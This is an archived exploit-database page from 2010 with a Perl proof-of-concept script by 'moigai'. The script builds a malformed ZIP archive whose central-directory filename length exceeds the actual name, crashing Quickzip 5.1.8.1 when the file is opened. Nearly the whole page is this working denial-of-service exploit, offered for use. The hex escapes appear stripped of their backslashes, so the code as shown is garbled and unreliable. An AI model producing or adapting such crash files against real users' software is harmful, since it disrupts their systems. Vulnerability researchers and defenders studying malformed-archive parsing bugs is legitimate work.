[dos / poc] - Quickzip 5.1.8.1 Denial of Service Vulnerabili
Posted on 02 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Quickzip 5.1.8.1 Denial of Service Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Quickzip 5.1.8.1 Denial of Service Vulnerability by moigai in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>================================================ Quickzip 5.1.8.1 Denial of Service Vulnerability ================================================ # Exploit Title: Quickzip 5.1.8.1 Denial of Service Vulnerability # Date: 2010/11/02 # Author: moigai # e-mail: again.liu@gmail.com # Version: 5.1.8.1 # Tested on: Windows XP SP3 En (VM) # Greetz to: Yoji my $file = "boom.zip"; my $localHeader = "x50x4bx03x04" . #Local file header signature "x00x00x00x00x00x00x00x00x00x00x00x00x00x00" . "x00x00x00x00x00x00x00x00x00x00x00x00"; my $centralDirHeader = "x50x4bx01x02" . #central dir header signature "x14x0bx00x00x00x00x00x00x00x00x00x00x00x00" . "x00x00x00x00x00x00x00x00x00x00" . "x07x00" . #file name length "x00x00x00x00x00x00x01x00x20x00x00x00x00x00" . "x00x00"; # The program crashes when the file name is shorter than the length specified above. # In the case of length specified equals 0x7, the program crash when the actual length is smaller than 0x4 my $filename = "yyy"; my $endCentralDirHeader = "x50x4bx05x06" . #end central dir header signature "x00x00x00x00x01x00x01x00x35x00x00x00x1ex00" . "x00x00x00x00"; my $zip = $localHeader . $centralDirHeader . $filename . $endCentralDirHeader; print " [+] Creating zip file "; open(FILE, ">$file"); print FILE $zip; close(FILE); print "[+] File " . $file . " created "; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-11-02]</pre></body></html>